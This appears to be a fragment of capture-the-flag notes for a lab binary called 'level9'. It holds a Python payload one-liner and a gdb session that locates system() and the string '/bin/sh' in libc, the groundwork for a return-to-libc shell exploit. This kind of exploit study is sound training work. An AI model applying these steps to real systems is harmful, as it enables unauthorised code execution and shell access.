python2.7 -c 'print("\x3a\x87\x04\x08")'  | ./level9

(gdb) break *0x8048674
Breakpoint 1 at 0x8048674
(gdb) break *0x804867c
Breakpoint 2 at 0x804867c
(gdb) break *0x8048693
Breakpoint 3 at 0x8048693

(gdb) print system 
$2 = {<text variable, no debug info>} 0xb7d86060 <system>

(gdb) info proc map
process 4691
Mapped address spaces:

        Start Addr   End Addr       Size     Offset objfile
         0x8048000  0x8049000     0x1000        0x0 /home/user/level9/level9
         0x8049000  0x804a000     0x1000        0x0 /home/user/level9/level9
         0x804a000  0x806b000    0x21000        0x0 [heap]
        0xb7cfa000 0xb7cfc000     0x2000        0x0 
        0xb7cfc000 0xb7d18000    0x1c000        0x0 /lib/i386-linux-gnu/libgcc_s.so.1
        0xb7d18000 0xb7d19000     0x1000    0x1b000 /lib/i386-linux-gnu/libgcc_s.so.1
0xb7d47000 0xb7eea000   0x1a3000        0x0 /lib/i386-linux-gnu/libc-2.15.so


(gdb) find 0xb7d47000, 0xb7eea000, "/bin/sh"
0xb7ea7c58
1 pattern found.